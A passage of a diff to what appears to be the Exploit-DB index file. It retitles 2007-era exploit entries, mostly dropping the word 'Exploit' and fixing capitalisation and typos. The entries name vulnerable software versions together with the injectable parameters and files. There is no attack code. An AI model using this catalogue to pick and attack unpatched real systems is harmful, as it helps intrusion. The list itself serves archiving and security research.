Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) SQL Injection",2007-02-06,cl24zy,php,webapps,0 -3279,platforms/windows/remote/3279.html,"Alibaba Alipay - (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 +3279,platforms/windows/remote/3279.html,"Alibaba Alipay - (Remove ActiveX) Remote Code Execution",2007-02-06,cocoruder,windows,remote,0 3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion",2007-02-07,Denven,php,webapps,0 -3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion Exploit",2007-02-08,ajann,php,webapps,0 +3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0 -3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - (comments.php) SQL Injection",2007-02-08,ajann,php,webapps,0 +3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0 3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - (register.php) SQL Injection",2007-02-08,ajann,php,webapps,0 3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos,0 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0 @@ -2964,12 +2965,12 @@ id,file,description,date,author,platform,type,port 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 -3295,platforms/asp/webapps/3295.txt,"Philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 +3295,platforms/asp/webapps/3295.txt,"philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow",2007-02-12,defsec,windows,remote,0 -3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion Exploit",2007-02-13,ajann,php,webapps,0 +3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion",2007-02-13,ajann,php,webapps,0 3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - (xarancms_haupt.php) SQL Injection",2007-02-13,ajann,php,webapps,0 3299,platforms/php/webapps/3299.pl,"PHPCC 4.2 Beta - (nickpage.php npid) SQL Injection",2007-02-13,ajann,php,webapps,0 -3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 +3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM / 4.1-SuSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 @@ -2990,13 +2991,13 @@ id,file,description,date,author,platform,type,port 3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 -3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - (newsordner) Remote File Inclusion Exploit",2007-02-16,ajann,php,webapps,0 -3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion Exploit",2007-02-16,ajann,php,webapps,0 +3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - (newsordner) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 +3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 -3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion Exploit",2007-02-18,ajann,php,webapps,0 +3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0 3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 @@ -3037,17 +3038,17 @@ id,file,description,date,author,platform,type,port 3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (Perl) (2)",2007-02-24,"Umesh Wanve",windows,local,0 -3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - (functions.php) Remote File Inclusion Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 +3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion",2007-02-24,"Mehmet Ince",php,webapps,0 3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Blind SQL Injection",2007-02-24,s0cratex,php,webapps,0 -3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Inclusion Exploit",2007-02-24,burncycle,php,webapps,0 -3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion Exploit",2007-02-24,bd0rk,php,webapps,0 +3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Inclusion",2007-02-24,burncycle,php,webapps,0 +3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion",2007-02-24,bd0rk,php,webapps,0 3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - (top.php laypath) Remote File Inclusion",2007-02-25,GoLd_M,php,webapps,0 3375,platforms/multiple/remote/3375.pl,"Oracle 10g KUPW$WORKER.MAIN - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3376,platforms/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3377,platforms/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3378,platforms/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 -3379,platforms/php/webapps/3379.php,"STWC-Counter 3.4.0 - (downloadcounter.php) Remote File Inclusion Exploit",2007-02-26,burncycle,php,webapps,0 -3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Remote Path Traversal",2007-02-27,"Sergey Gordeychik",windows,remote,0 +3379,platforms/php/webapps/3379.php,"STWC-Counter 3.4.0 - (downloadcounter.php) Remote File Inclusion",2007-02-26,burncycle,php,webapps,0 +3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",windows,remote,0 3381,platforms/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 @@ -3063,18 +3064,18 @@ id,file,description,date,author,platform,type,port 3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",multiple,dos,0 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0 -3396,platforms/linux/dos/3396.php,"PHP 4.4.4 - unserialize() ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",linux,dos,0 +3396,platforms/linux/dos/3396.php,"PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",linux,dos,0 3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0 3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps,0 -3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution Exploit",2007-03-03,DarkFig,php,webapps,0 +3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps,0 3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 PHPinfo() Remote Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0 -3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion Exploit",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Authenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 +3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 +3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0 @@ -3093,39 +3094,39 @@ id,file,description,date,author,platform,type,port 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) Remote File Inclusion",2007-03-07,GoLd_M,php,webapps,0 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3425,platforms/multiple/remote/3425.txt,"mod_security 2.1.0 - (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 -3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop Functions) Local Code Execution Exploit",2007-03-07,"Stefan Esser",linux,local,0 +3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 -3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 +3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote Denial of Service",2007-03-08,Antimatt3r,multiple,dos,0 3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 -3436,platforms/php/webapps/3436.txt,"WEBO (Web Organizer) 1.0 - (baseDir) Remote File Inclusion",2007-03-08,K-159,php,webapps,0 +3436,platforms/php/webapps/3436.txt,"WEBO (Web ORGanizer) 1.0 - 'baseDir' Remote File Inclusion",2007-03-08,K-159,php,webapps,0 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php) Remote File Inclusion",2007-03-08,DNX,php,webapps,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow Exploit",2007-03-09,"Stefan Esser",linux,local,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)",2007-03-09,"Daniel Roethlisberger",linux,dos,0 -3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Discslosure (PoC)",2007-03-09,rgod,multiple,local,0 +3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0 3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 3444,platforms/windows/dos/3444.pl,"Microsoft Internet Explorer - (FTP Server Response) Denial of Service (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - (Security Bypass / SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2007-03-09,Omni,php,webapps,0 -3448,platforms/php/webapps/3448.txt,"work system e-commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 +3448,platforms/php/webapps/3448.txt,"work system E-Commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g (Windows/x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0 3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 -3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion Exploit",2007-03-11,bd0rk,php,webapps,0 +3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion",2007-03-11,bd0rk,php,webapps,0 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) SQL Injection",2007-03-11,ajann,php,webapps,0 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 -3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - (fantastico) Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 -3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 +3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 +3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OS X) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos,0 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow Exploit (1)",2007-03-12,Marsu,windows,remote,0 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow Exploit (2)",2007-03-12,Marsu,windows,remote,0 @@ -3137,27 +3138,27 @@ id,file,description,date,author,platform,type,port 3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - (search.asp author) SQL Injection",2007-03-13,WiLdBoY,asp,webapps,0 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0 -3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - (root_path) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 +3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow",2007-03-14,"Winny Thomas",windows,remote,21 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows/x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 -3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 -3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 +3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 +3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0 3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow",2007-03-15,"Umesh Wanve",windows,remote,21 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 -3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - (INCLUDE_PATH) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 +3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 -3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 +3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 3488,platforms/windows/local/3488.php,"PHP 4.4.6 - ibase_connect() Local Buffer Overflow",2007-03-15,rgod,windows,local,0 -3489,platforms/php/webapps/3489.txt,"creative GuestBook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 +3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",bsd,remote,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 -3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryid) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 +3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryId) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,php,webapps,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503 3496,platforms/php/webapps/3496.php,"PHP-Stats 0.1.9.1b - (PC-REMOTE-ADDR) SQL Injection",2007-03-16,rgod,php,webapps,0 @@ -3168,7 +3169,7 @@ id,file,description,date,author,platform,type,port 3501,platforms/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,php,webapps,0 3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - (PHP-stats-options.php) Admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - (view.php logi) Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 -3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion Exploit",2007-03-17,GoLd_M,php,webapps,0 +3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,php,webapps,0 3506,platforms/php/webapps/3506.htm,"Guestbara 1.2 - Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - 'index.php' SQL Injection",2007-03-18,ajann,php,webapps,0 @@ -3181,29 +3182,29 @@ id,file,description,date,author,platform,type,port 3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - (index.php recid) SQL Injection",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 -3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit",2007-03-19,"Stefan Esser",osx,local,0 -3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0 +3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OS X) - header() Space Trimming Buffer Underflow Exploit",2007-03-19,"Stefan Esser",osx,local,0 +3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 3520,platforms/asp/webapps/3520.txt,"NetVios Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,asp,webapps,0 -3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion Exploit",2007-03-19,bd0rk,php,webapps,0 -3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion Exploit",2007-03-20,GoLd_M,php,webapps,0 +3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion",2007-03-19,bd0rk,php,webapps,0 +3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 3525,platforms/linux/local/3525.php,"PHP 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP 